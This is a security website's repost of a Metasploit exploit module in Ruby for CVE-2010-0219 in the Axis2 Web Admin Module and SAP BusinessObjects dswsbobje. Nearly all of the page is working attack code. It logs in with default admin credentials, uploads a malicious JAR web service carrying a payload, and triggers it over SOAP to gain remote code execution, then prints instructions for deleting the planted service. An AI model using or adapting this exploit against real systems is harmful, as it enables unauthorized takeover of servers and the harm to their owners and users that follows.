首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Axis2 / SAP BusinessObjects dswsbobje Upload Exec (meta)
来源:jabra[at]rapid7.com 作者:Joshua 发布时间:2010-11-17  
##
# $Id: axis2_deployer.rb 11046 2010-11-15 05:12:48Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'		   => 'Axis2 / SAP BusinessObjects dswsbobje Upload Exec',
			'Version'		=> '$Revision: 11046 
, 'Description' => 'This module logins to a Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.', 'References' => [ # General [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ], [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ], [ 'CVE', '2010-0219' ], ], 'Platform' => [ 'java', 'win', 'linux' ], # others? 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ], # # Platform specific targets only # [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' }, ], [ 'Linux X86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }, ], ], 'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ], 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(8080), OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]), OptString.new('PATH', [ true, "The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)", '/axis2']) ], self.class) register_autofilter_ports([ 8080 ]) end def upload_exec(session) contents='' name = Rex::Text.rand_text_alpha(8) services_xml = %Q{ <service name="#{name}" scope="application"> <description> #{Rex::Text.rand_text_alphanumeric(50 + rand(50))} </description> <messageReceivers> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-only" class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> </messageReceivers> <parameter name="ServiceClass"> metasploit.PayloadServlet </parameter> </service> } if target.name =~ /Java/ zip = payload.encoded_jar zip.add_file("META-INF/services.xml", services_xml) # We need this class as a wrapper to run in a thread. For some reason # the Payload class is giving illegal access exceptions without it. path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class") fd = File.open(path, "rb") servlet = fd.read(fd.stat.size) fd.close zip.add_file("metasploit/PayloadServlet.class", servlet) contents = zip.pack else end boundary = rand_text_alphanumeric(6) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; " data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << contents data << "\r\n--#{boundary}--" res = send_request_raw({ 'uri' => "/#{datastore['PATH']}/axis2-admin/upload", 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, 'Cookie' => "JSESSIONID=#{session}", } }, 25) if (res and res.code == 200) print_status("Successfully uploaded") else print_error("Error uploading #{res}") return end =begin res = send_request_raw({ 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp", 'method' => 'GET', 'headers' => { 'Cookie' => "JSESSIONID=#{session}", } }, 25) puts res.body puts res.code if res.code > 200 and res.code < 300 if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\" puts dir else if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) ) dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" puts dir end end end =end soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns='http://session.dsws.businessobjects.com/2007/06/01' xsi='http://www.w3.org/2001/XMLSchema-instance' data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n" data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n" data << '<soapenv:Header/>' + "\r\n" data << '<soapenv:Body>' + "\r\n" data << '<soapenv:run/>' + "\r\n" data << '</soapenv:Body>' + "\r\n" data << '</soapenv:Envelope>' + "\r\n\r\n" print_status("Polling to see if the service is ready") 1.upto 3 do Rex::ThreadSafe.sleep(3) res = send_request_raw({ 'uri' => "/#{datastore['PATH']}/services/#{name}", 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Length' => data.length, 'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/run' + '"', 'Content-Type' => 'text/xml; charset=UTF-8', } }, 15) if res.code > 200 and res.code < 300 print_status("") print_status("NOTE: You will need to delete the web service that was uploaded.") print_status("Using meterpreter:") print_status("rm \"webapps/#{datastore['PATH']}/WEB-INF/services/#{name}.jar\"") print_status("Using the shell:") print_status("cd \"webapps/#{datastore['PATH']}/WEB-INF/services\"") print_status("del #{name}.jar") print_status("") break end end =begin useful for axis2 or REST # Try to execute the payload 1.upto 5 do Rex::ThreadSafe.sleep(3) print_status("Polling to see if the service is ready") res = send_request_raw({ 'uri' => "/#{datastore['PATH']}/services/#{name}/run", 'method' => 'GET', 'headers' => { 'Cookie' => "JSESSIONID=#{session}", } }, 25) if res.code >= 200 and res.code < 300 # This should usually mean we got a shell break end end =end end def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] path = datastore['PATH'] success = false srvhdr = '?' begin res = send_request_cgi( { 'method' => 'POST', 'uri' => "/#{path}/axis2-admin/login", 'ctype' => 'application/x-www-form-urlencoded', 'data' => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25) if not (res.kind_of? Rex::Proto::Http::Response) raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding") end if res.code == 404 raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404") end srvhdr = res.headers['Server'] if res.code == 200 # Could go with res.headers["Server"] =~ /Apache-Coyote/i # as well but that seems like an element someone's more # likely to change success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/) session = $1 end end rescue ::Rex::ConnectionError print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication") end if success print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'") upload_exec(session) else print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'") end end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari 5.02 Stack Overflow Den
·NetWare 6.5 SunRPC Portmapper
·Trend Micro Internet Security
·Android 2.0/2.1 Use-After-Free
·Foxit Reader 4.1.1 Stack Overf
·DIZzy 1.12 Local Stack Overflo
·chCounter <= 3.1.3 SQL Injecti
·MP3-Nator Buffer Overflow (SEH
·Mosets Tree 2.1.6 (Joomla) Tem
·Realtek HD Audio Control Panel
·DATAC RealWin SCADA Server Buf
·Realtek Audio Microphone Calib
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved